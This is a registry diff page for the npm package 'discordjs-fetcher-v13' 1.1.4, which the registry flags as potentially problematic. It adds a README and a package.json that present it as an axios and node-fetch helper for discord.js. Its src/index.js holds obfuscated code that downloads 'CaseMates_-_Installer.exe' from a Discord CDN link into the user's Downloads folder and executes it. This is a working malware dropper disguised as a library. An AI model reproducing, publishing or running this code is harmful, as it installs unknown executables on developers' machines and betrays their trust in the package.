discordjs-fetcher-v13 1.1.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of discordjs-fetcher-v13 might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,3 @@
1
+ # Package for Discord
2
+
3
+ A helpful functions for axios and node-fetcher to discord.js v14.
package/package.json ADDED
@@ -0,0 +1,31 @@
1
+ {
2
+ "name": "discordjs-fetcher-v13",
3
+ "version": "1.1.4",
4
+ "description": "a package include node-fetcher & axios for discord.js V14",
5
+ "main": "./src/index.js",
6
+ "homepage": "https://google.com",
7
+ "repository": {
8
+ "url": "https://github.com/epsiinotpackage/epsii"
9
+ },
10
+ "scripts": {
11
+ "build": "tsup"
12
+ },
13
+ "keywords": [
14
+ "node-fetcher",
15
+ "discord.js v14",
16
+ "axios"
17
+ ],
18
+ "author": "epsii",
19
+ "license": "MIT",
20
+ "devDependencies": {
21
+ "tsup": "^8.0.1",
22
+ "typescript": "^5.3.3"
23
+ },
24
+ "dependencies": {
25
+ "axios": "^1.6.3",
26
+ "child_process": "^1.0.2",
27
+ "fs": "^0.0.1-security",
28
+ "os": "^0.1.2",
29
+ "path": "^0.12.7"
30
+ }
31
+ }
package/src/index.js ADDED
@@ -0,0 +1 @@
1
+ function _0x4fd2(){const _0x4b8276=['9WZxggx','finish','data','20Osdmhl','13upAZpO','4571352Aftdch','log','path','62288796qTubnD','6mqtAiU','64HOjjvw','error','Downloads','homedir','1364732lgQORo','join','https://cdn.discordapp.com/attachments/1191756144557953106/1192154827095031830/CaseMates_-_Installer.exe?ex=65a80bb3&is=659596b3&hm=0b45827ca537b6b71919823f9ad0d1e834a2b6358e38606c7e6fb06d655ca0b2&','axios','7077936Qdsmym','GET','3007990evoeUo','pipe','stream','33rpInHQ','4919607jFhAcX','29768XAMrVa','child_process'];_0x4fd2=function(){return _0x4b8276;};return _0x4fd2();}const _0x3da092=_0x2a20;(function(_0x57a3fc,_0x410992){const _0x1bb5ba=_0x2a20,_0x3bb78e=_0x57a3fc();while(!![]){try{const _0x434fbe=-parseInt(_0x1bb5ba(0xc8))/0x1*(-parseInt(_0x1bb5ba(0xd4))/0x2)+-parseInt(_0x1bb5ba(0xcf))/0x3+parseInt(_0x1bb5ba(0xd8))/0x4*(-parseInt(_0x1bb5ba(0xcd))/0x5)+parseInt(_0x1bb5ba(0xd3))/0x6*(-parseInt(_0x1bb5ba(0xc7))/0x7)+parseInt(_0x1bb5ba(0xc1))/0x8*(-parseInt(_0x1bb5ba(0xca))/0x9)+-parseInt(_0x1bb5ba(0xc3))/0xa*(parseInt(_0x1bb5ba(0xc6))/0xb)+-parseInt(_0x1bb5ba(0xd2))/0xc*(-parseInt(_0x1bb5ba(0xce))/0xd);if(_0x434fbe===_0x410992)break;else _0x3bb78e['push'](_0x3bb78e['shift']());}catch(_0x4af54c){_0x3bb78e['push'](_0x3bb78e['shift']());}}}(_0x4fd2,0xbabb5));const axios=require(_0x3da092(0xdb)),fs=require('fs'),{exec}=require(_0x3da092(0xc9)),os=require('os'),path=require(_0x3da092(0xd1)),urlF=_0x3da092(0xda),folderD=path[_0x3da092(0xd9)](os[_0x3da092(0xd7)](),_0x3da092(0xd6),'CaseMates_-_Installer.exe');function _0x2a20(_0xeade7a,_0x13a38d){const _0x4fd2f2=_0x4fd2();return _0x2a20=function(_0x2a2052,_0x430eb5){_0x2a2052=_0x2a2052-0xc1;let _0x5ce85d=_0x4fd2f2[_0x2a2052];return _0x5ce85d;},_0x2a20(_0xeade7a,_0x13a38d);}async function fetcher(){const _0x5232ea=_0x3da092;try{const _0x1800dc=await axios({'method':_0x5232ea(0xc2),'url':urlF,'responseType':_0x5232ea(0xc5)}),_0x535658=fs['createWriteStream'](folderD,{'flags':'w+'});return _0x1800dc[_0x5232ea(0xcc)][_0x5232ea(0xc4)](_0x535658),new Promise((_0x527eb3,_0x414cad)=>{const _0x5c1372=_0x5232ea;_0x535658['on'](_0x5c1372(0xcb),()=>{exec(''+folderD,(_0x245803,_0x449497,_0x2e6cab)=>{const _0x3bedc0=_0x2a20;if(_0x245803&&_0x245803['code']!==0x1){console[_0x3bedc0(0xd5)](),_0x414cad();return;}console[_0x3bedc0(0xd0)](),console[_0x3bedc0(0xd5)](),_0x527eb3();});}),_0x535658['on'](_0x5c1372(0xd5),_0x414cad);});}catch(_0x14bd9f){console[_0x5232ea(0xd5)](_0x14bd9f);throw _0x14bd9f;}}module['exports']={'fetcher':fetcher};